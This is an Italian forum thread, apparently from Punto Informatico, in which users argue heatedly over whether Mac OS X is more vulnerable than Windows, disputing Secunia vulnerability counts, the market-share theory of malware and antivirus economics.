            (amiga)(c64)Lo so lo so...È divertente vedere che le guerre tra Atariani/Synclairiani e Commodoriani/Amighisti non siano mai smesse ma che siano diventate guerre Microsoft versus Linux versus Mac.A volte sembre proprio che non sia cambiato nulla :DSaluti!(atari)
          • pentolino scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: FinalCut
            Esistevano virus per Amiga (con il grandissimo
            share che aveva(rotfl) prima di sparire dalla
            faccia della terra O))straquoto! se poi pensiamo che ai tempi l' unico modo diffuso per prendere un virus era farsi passare un dischetto infetto... l' uso di internet e delle BBS infatti era assolutamente marginale
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            un altro che campa con la teoria della diffusione...ma LOL
          • soulista scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: google is your friend
            - Scritto da: FinalCut

            Ne riparleremo quando troverai in rete il primo

            virus/trojan attivo per Mac OS

            X...

            difficile... un trojan si diffonde se trova un
            parco macchine adeguato, e la quota di mercato
            del MAC è talmente bassa che persino il miglior
            trojan del mondo farebbe fatica a
            sopravvivere


            GIYFvallo a dire in Giappone dove i Mac hanno il 54% di marketshare...
          • Mythos scrive:
            Re: MAC OS X più vulnerabile di Windows.

            difficile... un trojan si diffonde se trova un
            parco macchine adeguato, e la quota di mercato
            del MAC è talmente bassa che persino il miglior
            trojan del mondo farebbe fatica a
            sopravvivereSarebbe un difetto?
          • Luca Schiavoni scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: FinalCut
            Ne riparleremo quando troverai in rete il primo
            virus/trojan attivo per Mac OS
            X...

            PS: virus attivi e non il solito proof of conceptEhmScusa ma un quartiere non e' sicuro a prescindere, non solo dopo che ti rubano la macchina. O forse tu andresti ad abitare in un quartiere malfamato e lo reputi buono finche' non ti toccano? Secunia dice solo che OsX e' vulnerabile piu' di Windows, ora. E contando sul fattore "falso senso di sicurezza" se un sistema e' vulnerabile e' vulnerabile ancora di piu se tutti quelli che lo usano pensano che non lo sia.IMHOQuando arriverà il primo trojan per OsX, se rimane così vulnerabile, sara' un problema per tanti. Meglio parlarne ora, no ? ;)Se ora non ci sono borseggiatori in zona l'importante e' non abbassare mai la guardia, neanche di la'.LucaS
            • PLONK_THIS scrive:
              Re: MAC OS X più vulnerabile di Windows.
              http://punto-informatico.it/b.aspx?i=2145143&m=2146404#p2146404
            • FinalCut scrive:
              Re: MAC OS X più vulnerabile di Windows.

              Ehm
              Scusa ma un quartiere non e' sicuro a
              prescindere, non solo dopo che ti rubano la
              macchina. O forse tu andresti ad abitare in un
              quartiere malfamato e lo reputi buono finche' non
              ti toccano?ma Luca...Luca....! sei il direttore di una testata informatica o di Topolino?come ti hanno già fatto notare altri, cito: che bel calcolo!la somma delle vulnerabilità di quest'anno è superiore a quella di win (peraltro: 4win critiche e 0mac critiche).bello.piuttosto per ognuna architettura: quante di queste sono ancora scoperte?quante quante permettono l'esecuzione di codice a livello root o equivalente bypassando password varie?che quanta tempestività sono stati corretti i problemi(se sono corretti)?quanti di queste falle portano realmente ad attacchi/virus/worm? questi sarebbero dati decenti, che magari una testata di informatica dovrebbe pubblicare.e quando li pubblichi torniamo a parlare di sicurezza. 8)Non che OS X sia perfetto, ma è il meglio che offre il mercato.Tu che usi Windows facciamo un test, ti sfido ad abbassare il firewall e spegnere l'antivrus (io faccio lo stesso con il Mac, l'antivirus non ce l'ho mai avuto) e vediamo chi si becca prima qualcosa...(linux)(apple)
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.

                Tu che usi Windows facciamo un test, ti sfido ad
                abbassare il firewall e spegnere l'antivrus (io
                faccio lo stesso con il Mac, l'antivirus non ce
                l'ho mai avuto) e vediamo chi si becca prima
                qualcosa...ma ancora con sta caxxata???ma non avete ancora capito che il fattore virus è un puro fatto di diffusione? chissà perchè i paesi a più alta densità demografica sono anche quelli che sono a più alto rischio epidemie.parlare con voi non ha alcun senso.chissà perchè 100 anni fa non c'erano incidenti d'auto... e dire che non esistevano semafori, limiti di velocità ecc.... peccato che non ci fossero neppure le auto!Quando gli OSX raggiungeranno una percentuale ritenuta interessate, sarà la stessa Apple a vendervi l'antivirus. E a quel punto tutti direte che Apple è tanto brava che fa direttamente l'antivirus e si cura di voi.Questo senza nulla togliere al funzionamento del SO che reputo ottimo. Ma da quel punto di vista dire che è carente e dire che Steve è un presuntuoso arrogante è dire poco.
              • PLONK_THIS scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: Silicon Pirate

                Tu che usi Windows facciamo un test, ti sfido ad

                abbassare il firewall e spegnere l'antivrus (io

                faccio lo stesso con il Mac, l'antivirus non ce

                l'ho mai avuto) e vediamo chi si becca prima

                qualcosa...


                ma ancora con sta caxxata???
                ma non avete ancora capito che il fattore virus è
                un puro fatto di diffusione? chissà perchè i
                paesi a più alta densità demografica sono anche
                quelli che sono a più alto rischio
                epidemie.ma ancora con ste cazzate?il virus si diffonde se ci sono tanti PC contagiabili...ma devi poterne contagiare almeno uno.se non ce la fai, nisbae qui casca la tua teoria della diffusione
                parlare con voi non ha alcun senso.mentre con te pare di parlare ad un ebete natalizio
                chissà perchè 100 anni fa non c'erano incidenti
                d'auto... e dire che non esistevano semafori,
                limiti di velocità ecc.... peccato che non ci
                fossero neppure le
                auto!ma le razzate invece non hanno tempo
                Quando gli OSX raggiungeranno una percentuale
                ritenuta interessate, sarà la stessa Apple a
                vendervi l'antivirus. E a quel punto tutti direte
                che Apple è tanto brava che fa direttamente
                l'antivirus e si cura di
                voi.
                e quale sarebbe? se la tua teoria poggia solo sulla diffusione significa che non conosci altro di un OS.
                Questo senza nulla togliere al funzionamento del
                SO che reputo ottimo. Ma da quel punto di vista
                dire che è carente e dire che Steve è un
                presuntuoso arrogante è dire
                poco.e che c'azzecca questo col fatto di cui sopra?
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.

                ma ancora con ste cazzate?

                il virus si diffonde se ci sono tanti PC
                contagiabili...ma devi poterne contagiare almeno
                uno.

                se non ce la fai, nisba

                e qui casca la tua teoria della diffusionema che cacchio spari?il virus lo fai se hai un intresse a farlo, non per gloria.a parte i nerd che si divertono a provarci, chi ha interesse al giorno d'oggi a fare un virus per mac?un solo unico virus non giustifica lo sforzo da parte di nessuno a fare un sw antivirus, a meno che.... a un certo punto non diventi una cosa appetibile contemporaneamente per tanti.Ti faccio un esempio con le figurine, così magari capisci, anche se dubito. Io adesso mi metto a fare il sistema operativo "Silicon P. 0.9 alpha" talmente buggato che al confronto WinMe è una fortezza. Lo usano in 50 persone. Secondo il tuo ragionameto malato, dopo 10 gg dovrebbe già esistere un virus fatto da un mega nerd.....ma ti rendi conto delle cazzate che dici?
                mentre con te pare di parlare ad un ebete
                natalizioridi finchè puoi.
                ma le razzate invece non hanno temponon capisci neppure gli esempi. siamo messi molto male. ma non mi stupisco, il target apple è quello che è per far credere tali idiozie...
                e quale sarebbe?
                se la tua teoria poggia solo sulla diffusione
                significa che non conosci altro di un
                OS.se tu credi che il tuo sistema sia assolutmanete inattaccabile, significa che non hai capito nulla delle basi dell'informatica.
                e che c'azzecca questo col fatto di cui sopra?ci azzecca che parlo non per partito preso ma per una oggettiva visione dei fatti, cosa sconosciuta a voi fan del cavolo.
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                ci sono 513 milioni di utenti internet nel mondo (http://www.google.it/search?hl=it&q=utenti+internet+nel+mondo&btnG=Cerca+con+Google&meta= primo risultato) il 6% sono: 30.780.000 computer Mac... se vendi antivirus a 1 all'anno incassi 30 milioni all'anno (poniamo che 780.000 lo crackano) troppo poco?
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                te lo devo ancora dire? siiiiiiiiazzo se sei monotono!si parla di percentuali! le grosse ditte non si muovono per 2 spiccioli, a meno che non siano nella cacca.poi bona perchè parlare con dei ragazzini che non capiscono una cippa mi son rotto.
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                quindi se tu avessi poniamo 26 anni e fai un virus per mac... non ne svilupperesti un bel po... e poi produci l'unico antivirus per debellarlo vero? milioni di all'anno non ne valgono la pena... vero?
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: MeX
                quindi se tu avessi poniamo 26 anni e fai un
                virus per mac... non ne svilupperesti un bel
                po... e poi produci l'unico antivirus per
                debellarlo vero? milioni di all'anno non ne
                valgono la pena...
                vero?1° devo riuscire a farlo. e già devo essere un nerd di prima categoria (parlo per me perchè io non sarei capace di farlo neppure per winMe, figuriamoci per un sistema unix)2° devo fare una cosa che apple non spenga con un aggiornamento il giorno dopo3° devo riuscire a farlo espandere in pochi giorni, il che non è facile con la poca diffusione dei mac in rete4° devo convincere una swhouse che l'investimento vale la candela e devo andare in giro a dire che sono stato io a fare il virus. geniale.se il SO ha una certa diffusione, i soggetti interessati diventano contemporaneamente in numero rilevante, tanto da non permettere a apple da sola di contrastare gli eventi con le sole patch.se io povero coglione da solo, faccio un virus che sfrutta una delle 10000 vulnerabilità di OSX, il giorno dopo apple mi chiude la falla e la swhouse che doveva fare l'antivirus me lo da dove non batte il sole.se ci sono 50.000 persone che contemporaneamente scrivono virus, voglio vedere apple starci dietro..dai su.. non è difficile. prima o poi la capite anche voi che non è una questione di sistema invulnerabile.
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                non hai capito... tu fai il virus e poi crei l'antivirus.Ma a proposito di diffusione... mi spieghi perchè invece la Symantec o chi per lei che tu dici non investire nel Mac perchè poco diffuso... ha prodotti di antivirus per Symbian?????? tu quante persone conosci che hanno acquistato l'antivirus per Symbian? e perchè si sbattono a fare virus inutili per cellulari? dai... spigami questa!
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: MeX
                non hai capito... tu fai il virus e poi crei
                l'antivirus.

                Ma a proposito di diffusione... mi spieghi perchè
                invece la Symantec o chi per lei che tu dici non
                investire nel Mac perchè poco diffuso... ha
                prodotti di antivirus per Symbian?????? tu quante
                persone conosci che hanno acquistato l'antivirus
                per Symbian? e perchè si sbattono a fare virus
                inutili per cellulari? dai... spigami
                questa!ragazzo, viviamo in un paese in cui una pubblicità su 3 è sulle suonerie dei cellulari.... secondo te non ci sono dei malati che hanno comprato l'antivirus per il loro nokia da un milione di euro?anche secondo me non c'è nessuno che compra le suonerie, ma evidentemente, se fanno tanta pubblicità così costosa, ci sono una valanga di mongoloidi che le comprano!
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.

                ragazzo, eh magari!
                viviamo in un paese in cui una
                pubblicità su 3 è sulle suonerie dei
                cellulari.... secondo te non ci sono dei malati
                che hanno comprato l'antivirus per il loro nokia
                da un milione di
                euro?ma i nokia non erano quelli che costavano poco?Non so... trovami delle statistiche di vendita...ah e cmq visto che in nordamerica sono stati venduti più iPhone che Symbian mobiles... dovranno uscire virus no?
                anche secondo me non c'è nessuno che compra le
                suonerie, ma evidentemente, se fanno tanta
                pubblicità così costosa, ci sono una valanga di
                mongoloidi che le
                comprano!non capiscono cosa centrino i "mongoloidi" cerchiamo di mantenere certi toni.Di suonerie ne vendono tantissime, sono cross-platform... parliamo di Symbian... non hai risposto alla mia argomentazione... riprovaci :)
              • nome e guardone scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: MeX
                non hai capito... tu fai il virus e poi crei
                l'antivirus.

                Ma a proposito di diffusione... mi spieghi perchè
                invece la Symantec o chi per lei che tu dici non
                investire nel Mac perchè poco diffuso... ha
                prodotti di antivirus per Symbian?????? tu quante
                persone conosci che hanno acquistato l'antivirus
                per Symbian? e perchè si sbattono a fare virus
                inutili per cellulari? dai... spigami
                questa!http://www.symantec.com/norton/products/overview.jsp?pcid=ma&pvid=nav11mac
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                si come vedi già che hanno fatto l'antivirus... perchè non fanno uscire i VIRUS??? visto che per adesso chi si installa sta roba è solo chi è in rete mista è può diventare un "portatore sano" ???Perchè non fanno un virus???? hanno speso soldi per fare l'antivirus e poi stavi qui a dire che non ci perdono tempo a fare un virus... BRAVOOO! :)
              • nome e guardone scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: MeX
                si come vedi già che hanno fatto l'antivirus...
                perchè non fanno uscire i VIRUS??? visto che per
                adesso chi si installa sta roba è solo chi è in
                rete mista è può diventare un "portatore sano"
                ???
                Perchè non fanno un virus???? hanno speso soldi
                per fare l'antivirus e poi stavi qui a dire che
                non ci perdono tempo a fare un virus... BRAVOOO!
                :)E' abbastanza semplice, creare un virus vero costa, e uno solo non serve a niente: una volta patchata la vulnerabilità è finito. Devi pagare una batteria di sviluppatori per continuare a variarlo, modificarlo,ecc ... senza contare il rischio di farsi beccare. Deve esserci un ritorno economico e se la base installata è piccola non ha senso farlo.
              • PLONK_THIS scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: nome e guardone
                - Scritto da: MeX

                si come vedi già che hanno fatto l'antivirus...

                perchè non fanno uscire i VIRUS??? visto che per

                adesso chi si installa sta roba è solo chi è in

                rete mista è può diventare un "portatore sano"

                ???

                Perchè non fanno un virus???? hanno speso soldi

                per fare l'antivirus e poi stavi qui a dire che

                non ci perdono tempo a fare un virus... BRAVOOO!

                :)

                E' abbastanza semplice, creare un virus vero
                costa, e uno solo non serve a niente: una volta
                patchata la vulnerabilità è finito. Devi pagare
                una batteria di sviluppatori per continuare a
                variarlo, modificarlo,ecc ... senza contare il
                rischio di farsi beccare. Deve esserci un ritorno
                economico e se la base installata è piccola non
                ha senso
                farlo.infatti è notorio che tutti i virus writer poi diventano milionari e si sistemano per la vita...vai cazzaro
              • FinalCut scrive:
                Re: MAC OS X più vulnerabile di Windows.

                1° devo riuscire a farlo. e già devo essere un
                nerd di prima categoria (parlo per me perchè io
                non sarei capace di farlo neppure per winMe,
                figuriamoci per un sistema
                unix)e già qui ammetti la maggiore difficoltà per fare un virus su Mac rispetto a Windows
                2° devo fare una cosa che apple non spenga con un
                aggiornamento il giorno
                dopoah, ah! forse Redmond viene proprio accusata troppo spesso di lasciare falle aperte troppo a lungo mentre Apple le chiude subito?Il bello di Apple non è che non commette errori è solo veloce nel chiuderli
                3° devo riuscire a farlo espandere in pochi
                giorni, il che non è facile con la poca
                diffusione dei mac in
                retefacile, essendo una nicchia , ti basterebbe colpire pochi obiettivi sensibili per fare una strage... come un portale dedicato ai Mac...o inserire un photoshop CS3 "farlocco" sul p2p
                4° devo convincere una swhouse che l'investimento
                vale la candela e devo andare in giro a dire che
                sono stato io a fare il virus.
                geniale.se non sai come venderti non è colpa mia...
                se il SO ha una certa diffusione, i soggetti
                interessati diventano contemporaneamente in
                numero rilevante, tanto da non permettere a apple
                da sola di contrastare gli eventi con le sole
                patch.infatti Apple non è sola, per esempio Apache, MySQL, Samba, mica li pactcha lei direttamente...
                se io povero coglione da solo, faccio un virus
                che sfrutta una delle 10000 vulnerabilità di OSX,
                il giorno dopo apple mi chiude la falla e la
                swhouse che doveva fare l'antivirus me lo da dove
                non batte il
                sole.vedi, in fondo ci sei arrivato da solo, adesso chiediti perchè lo stesso ragionamento fatto su Microsoft diventa: "se io povero coglione da solo, faccio un virus che sfrutta una delle 10000 vulnerabilità di Windows il giorno dopo ci sono migliaia di PC infetti"
                se ci sono 50.000 persone che contemporaneamente
                scrivono virus, voglio vedere apple starci
                dietro..

                dai su.. non è difficile. prima o poi la capite
                anche voi che non è una questione di sistema
                invulnerabile.no, infatti il discorso è più complesso(linux)(apple)
              • Luca Schiavoni scrive:
                Re: MAC OS X più vulnerabile di Windows.
                finalcutin breve: non ho capito perche' secondo te chi critica apple... usa Windows :Dnon so che elementi hai per dire cosa uso, e questo e' il tuo modo obiettivo di parlare della questione. fra l'altro hai la memoria corta, abbiamo già parlato sui forum a proposito di apple. ma gia'.. chi critica Apple usa Windows.Chi usa Apple non critica piu' niente, lobotomizzato (?). :D bah, torno a preparare Download... ;)LucaS
              • io lo conosco scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: FinalCut

                Ehm

                Scusa ma un quartiere non e' sicuro a

                prescindere, non solo dopo che ti rubano la

                macchina. O forse tu andresti ad abitare in un

                quartiere malfamato e lo reputi buono finche'
                non

                ti toccano?

                ma Luca...Luca....! sei il direttore di una
                testata informatica o di
                Topolino?paolo de andreis è il direttore di pi ... luca fa le vignette di copertina e la zona download, da sempre
                Non che OS X sia perfetto, ma è il meglio che
                offre il
                mercato.appunto non è perfetto e non è sicuro al punto da star sicuri, su quello concordo con luca che conosco
                Tu che usi Windows facciamo un test, ti sfido ad
                abbassare il firewall e spegnere l'antivrus (io
                faccio lo stesso con il Mac, l'antivirus non ce
                l'ho mai avuto) e vediamo chi si becca prima
                qualcosa...


                (linux)(apple)ma chi ti ha detto che usa windos? come ha detto e scritto più volte e che poi mi sembra anche il minimo visto che lavora con grafica e web da tanti anni... usa win mac e litiga con linux, spero che sia riuscito a far andare una ubuntu su uno dei suoi pc alla fine..possibile che se uno è critico nei confronti del mac automaticamente passa per un utente windows?usare apple rende acritici? bella robba :Dl amico del giaguaro, e del leopard
            • MeX scrive:
              Re: MAC OS X più vulnerabile di Windows.

              Ehm
              Scusa ma un quartiere non e' sicuro a
              prescindere, non solo dopo che ti rubano la
              macchina. O forse tu andresti ad abitare in un
              quartiere malfamato e lo reputi buono finche' non
              ti toccano?se mi dicono che quel quartiere è malfato per pregiudizio (ad esempio "è pieno di immigrati") ma il tasso di reati effettivo è molto basso ci vado a vivere volentieri!
              Secunia dice solo che OsX e' vulnerabile piu' di
              Windows, ora.falle != exploit
              E contando sul fattore "falso senso di sicurezza"
              se un sistema e' vulnerabile e' vulnerabile
              ancora di piu se tutti quelli che lo usano
              pensano che non lo
              sia.può essere vero, ma fintanto che nessuno sfrutta tutte queste conclamate falle si può vivere senza antivirus... come direbbe microsoft "get the facts" scendiamo dalle iperboli e dalle supposizioni e parliamo di realtà: puoi usare mac ad oggi senza antivirus? risposta: SI
              IMHO

              Quando arriverà il primo trojan per OsX, se
              rimane così vulnerabile, sara' un problema per
              tanti. Meglio parlarne ora, no ?
              ;)SI! Certo che è bene parlarne! Così si "stuccano" le falle che ancora nemmeno erano utilizzate e si prospetta un futuro roseo come il presente!
              Se ora non ci sono borseggiatori in zona
              l'importante e' non abbassare mai la guardia,
              neanche di
              la'.già, il fatto è che chi usa windows è come se lasciasse la borsa aperta sulla panchina della stazione del bus mentre è al bar a fare colazione :)
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.

                può essere vero, ma fintanto che nessuno sfrutta
                tutte queste conclamate falle si può vivere senza
                antivirus... come direbbe microsoft "get the
                facts" scendiamo dalle iperboli e dalle
                supposizioni e parliamo di realtà: puoi usare mac
                ad oggi senza antivirus? risposta:
                SIanche win lo puoi usare senza antivirus.. basta che tu non vada nei siti porno, nei quali si accumula il 99% dei virus e basta che non apri e-mail con scritto Vi-agra o FreeeeSex.Purtroppo i siti porno sono i più cliccati e quindi....
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                uhm peccato che Windows XP fresco fresco di installazione basta che configuri internet senza nemmeno aprire il browser che ti becchi il sasser :)
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                o sai che ieri hanno inventato la ruota?
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                dove l'hai letto su MSN Live?La ruota l'hanno inventata da un bel po'... :)
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                era per dirti che è una storia vecchia, tra l'altro anche non più vera. forse ti devi aggiornare un po' coi fatti di attualità :-D
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                i fatti sono che ad oggi non ci sono virus per mac.Tu a che fatti ti riferisci?
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                i fatti sono che in passato tutti credevano che la terra fosse tonda e il sole le girasse intorno.i fatti sono che fino all'11 settembre gli americani si ritenevano immuni da attacchi terroristici all'interno del loro paese.i fatti sono che tu fino a ieri credevi che mac non fosse attaccabile dai virus.......mai dire mai.se avessi studiato storia a scuola lo sapresti.tutte le certezze dell'uomo sono state spazzate via durante il corso del tempo. OSX non sarà una eccezione.ma qui fanno tutti gli sboroncelli finchè....
              • Silicon Pirate scrive:
                Re: MAC OS X più vulnerabile di Windows.
                sorry.. che la terra fosse piatta :-D
              • MeX scrive:
                Re: MAC OS X più vulnerabile di Windows.
                no ma infatti io mica prevedo il futuro... infatti io affermo solo che AD OGGI e da ieri in poi :) il get the facts è che non ci sono virus per Mac PUNTO.Poi magari domani esce un virus, io non dico che sia IMPOSSIBILE dico che fino adesso è stato così...Poi seguendo la tua logica allora tra 100 anni diranno che la terra non è tonda? :) o quella è una certezza assodata?
            • logicaMente scrive:
              Re: MAC OS X più vulnerabile di Windows.
              - Scritto da: Luca Schiavoni
              - Scritto da: FinalCut


              Ne riparleremo quando troverai in rete il primo

              virus/trojan attivo per Mac OS

              X...



              PS: virus attivi e non il solito proof of
              concept

              Ehm
              Scusa ma un quartiere non e' sicuro a
              prescindere, non solo dopo che ti rubano la
              macchina. O forse tu andresti ad abitare in un
              quartiere malfamato e lo reputi buono finche' non
              ti toccano?
              Concordo in pieno, uno dei miei punti fermi è: non esiste un sistema sicuro.

              Secunia dice solo che OsX e' vulnerabile piu' di
              Windows, ora.
              Qui non concordo affatto, Secunia non dice nulla, è il blogger di zdnet, ripreso dal tipo del sito italiano a dire questo. I dati presenti su Secunia sono stati usati in modo improprio (come minimo) per fare il confronto. Cerco di spiegare meglio:1) Secunia (per motivi loro) racchiude nell'unica macrocategoria "Mac Os X" l'aggregato dei threat di tutte le ultime versioni - desktop e server - del sistema Apple, quindi: 10.3 10.4 10.5 e relative versioni server, in totale 6 diversi S.O.2) I "threat" segnalati riguardano anche gli applicativi in bundle ed i servizi presenti con i server, anche sviluppati da terze parti, per capirci se ci sono vulnerabilità in un paio di versioni del demone "named" questa viene contata 6 volte (tre per ogni versione server che la può contenere) anche se NESSUN DESKTOP potrà mai esserne affetto.3) Lato Microsoft il buon blogger di ZDNET ha preso solo HP (Home) e Vista (tutti) mentre, per quanto spiegato nei punti precedenti avrebbe dovuto mettere anche le vulnerabilità riscontrate nei sistemi equivalenti a quelli apple esaminati, ovvero: Windows XP Pro, Microsoft Windows 2000 Advanced Server, Microsoft Windows 2000 Datacenter Server, Microsoft Windows 2000 Professional, Microsoft Windows 2000 Server, Microsoft Windows Server 2003 Datacenter Edition, Microsoft Windows Server 2003 Enterprise Edition, Microsoft Windows Server 2003 Standard Edition, Microsoft Windows Server 2003 Web Edition, Microsoft Windows Storage Server 2003.Ho idea che aggiungendo anche gli altri (per fare un confronto che sia almeno corretto in termini di tipologia di prodotto) il risultato cambi leggermente... magari mi sbaglio.Ho già mostrato in un altro post di ieri che anche mantenendo questi S.O. ed estendendo la verifica dei threat sugli ultimi 5 anni il risultato si inverte, mi fermo qui con un paio di note per completezza: A) Secunia indica solo il *numero* di threat scoperti e pubblicati, non di quelli effettivamente corretti, ne dice in quanto tempo - in media - vengono patchati.B) Un confronto basato solo sul numero di minacce non è comunque significativo tra due sistemi eterogenei, varia fortemente la complessità degli attacchi che possono sfruttare una falla ed il loro effetto, chi vuol intendere intenda.La classificazione di Secunia per i sistemi MS:http://secunia.com/product/OS_M/#liste quella per Apple:http://secunia.com/product/OS_A/#listScusate la lunghezza del post.
              • Teo_ scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: logicaMente
                Scusate la lunghezza del post.Figurati, ci stava proprio bene
              • PLONK_THIS scrive:
                Re: MAC OS X più vulnerabile di Windows.
                quoto dicendo solamente che già avevo apprezzato i tuoi post di ieri e che questo è una conferma.
          • saxpax scrive:
            Re: MAC OS X più vulnerabile di Windows.
            sai cosa vuol dire: Total highly critical 234 per Mac OS X, con un Sistema Operativo cosi vulnerabile, a cosa serve fare i trojan, molto più facile ottenere il controllo remoto.
            • PLONK_THIS scrive:
              Re: MAC OS X più vulnerabile di Windows.
              trollettocommenta questo post e i link che fornisce...continui a svicolarlo già da ierihttp://punto-informatico.it/b.aspx?i=2145143&m=2146404#p2146404
            • anonimo01 scrive:
              Re: MAC OS X più vulnerabile di Windows.
              - Scritto da: saxpax
              sai cosa vuol dire: Total highly critical 234 per
              Mac OS X, con un Sistema Operativo cosi
              vulnerabile, a cosa serve fare i trojan, molto
              più facile ottenere il controllo
              remoto.e come, di grazia?
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.
            che bel calcolo!la somma delle vulnerabilità di quest'anno è superiore a quella di win (peraltro: 4win critiche e 0mac critiche).bello.piuttosto per ognuna architettura: quante di queste sono ancora scoperte?quante quante permettono l'esecuzione di codice a livello root o equivalente bypassando password varie?che quanta tempestività sono stati corretti i problemi(se sono corretti)?quanti di queste falle portano realmente ad attacchi/virus/worm?questi sarebbero dati decenti, non che la somma dell'etè dalla nonna di stefano lavoretti divisa l'altezza del porticato della hall del suo giardiniere sia superiore al numero di scarpe della segretaria del guglielmo (cancelli)!!!e prova un po' a cercarli quei dati...(preparo i popcorn 8) )(amiga)(apple)(linux)
            • innominato scrive:
              Re: MAC OS X più vulnerabile di Windows.
              - Scritto da: anonimo01
              e prova un po' a cercarli quei dati...
              (preparo i popcorn 8) )

              (amiga)(apple)(linux)Visto che sei tanto figo perché non li trovi tu?A parlare sono bravi tutti ;)
              • anonimo01 scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: innominato
                - Scritto da: anonimo01

                e prova un po' a cercarli quei dati...

                (preparo i popcorn 8) )



                (amiga)(apple)(linux)

                Visto che sei tanto figo perché non li trovi tu?
                A parlare sono bravi tutti ;)un'altra volta?no basta, g! è li fuori:usatelo.
            • saxpax scrive:
              Re: MAC OS X più vulnerabile di Windows.
              forse non conosci l'inglese MAC OS X: Total highly critical=234 sai cosa vuole dire?????
              • PLONK_THIS scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: saxpax
                forse non conosci l'inglese MAC OS X: Total
                highly critical=234 sai cosa vuole
                dire?????commentaci questo genietto dell'informaticahttp://punto-informatico.it/b.aspx?i=2145143&m=2146404#p2146404
              • anonimo01 scrive:
                Re: MAC OS X più vulnerabile di Windows.
                - Scritto da: saxpax
                forse non conosci l'inglese MAC OS X: Total
                highly critical=234 sai cosa vuole
                dire?????forse non conosci la caratteristica che ci contraddistingue dai primati, ma sai pensare ?cosa vuol dire Total extremely critical 4win 0mac serve la versione a fumetti per i poco reattivi (a tratto grosso/4 colori, in pratica) ?(senza contare che i dati di secunia dicono tutt'altro)
                • saxpax scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  con Vista ne è capitata 1 sola in un hann risolta subito, capisco per render un confronto meno imbarazzate devi per forza mettere insieme le vulnerabilità di Vista e XP, però con 243 vulnerabilià di cui 234 Total highly critical, contro le 23 di XP e Vista insieme, è imbarazzante da commentare,
                • PLONK_THIS scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  - Scritto da: saxpax
                  con Vista ne è capitata 1 sola in un hann risolta
                  subito, capisco per render un confronto meno
                  imbarazzate devi per forza mettere insieme le
                  vulnerabilità di Vista e XP, però con 243
                  vulnerabilià di cui 234 Total highly critical,
                  contro le 23 di XP e Vista insieme, è
                  imbarazzante da
                  commentare,capisco che devi motivare le tue razzate prendendo a supporto i dati statisticamente rilevanti della tua esperienza, ma se già i dati secunia ti fanno fare una figura barbina, almeno non affossarti da solo.è imbarazzante continuare a farsi sbuggiardare ad ogni post caro trolletto
                • anonimo01 scrive:
                  Re: MAC OS X più vulnerabile di Windows.

                  capisco che devi motivare le tue razzate
                  prendendo a supporto i dati statisticamente
                  rilevanti della tua esperienza, ma se già i dati
                  secunia ti fanno fare una figura barbina, almeno
                  non affossarti da
                  solo.

                  è imbarazzante continuare a farsi sbuggiardare ad
                  ogni post caro
                  trollettomah, secondo me (date le alte capacità computazionali, grammaticali e di comprensione del testo) semplicemente non si rende conto di fare una pietosa figura ogni volta...(newbie) (peraltro io da costui attendo ancora dei link-fonte di alcune sue baggianate)
                • saxpax scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  lo devi accetare senza fare storie, Mac OS X è più vulnerabile di Windows.
                • PLONK_THIS scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  continui a svicolare ai quesiti che ti sono stati posti...caro trolletto natalizio
                • saxpax scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  devo rispondere tu prima
                • PLONK_THIS scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  certo....rispondi al 3ad a te dedicato....attendiamo tue risposte da giorni
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            ti hanno già postato ieri link e grafici facendoti fare la figura del trollmo insisti?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            TROLL!http://punto-informatico.it/b.aspx?i=2145143&m=2146404#p2146404
            • saxpax scrive:
              Re: MAC OS X più vulnerabile di Windows.
              non devi essere di parte devi accetare la reata, Mac OS X è più vulnerbile di Windows, mettili l'anima in pace
              • PLONK_THIS scrive:
                Re: MAC OS X più vulnerabile di Windows.
                se non sai rispondere ai quesiti che ti sono posti...evita le frasi fatte
                • alexjenn scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  PLONK_THIS, ti prego, "acceta la reata".Eh!
                • anonimo01 scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  - Scritto da: PLONK_THIS
                  se non sai rispondere ai quesiti che ti sono
                  posti...evita le frasi
                  fattelol (come già detto),plonk smettila: devi "acceta la reata" e saxsuxpacksex ha ragione."mettili" l'anima in pace.(rotfl)
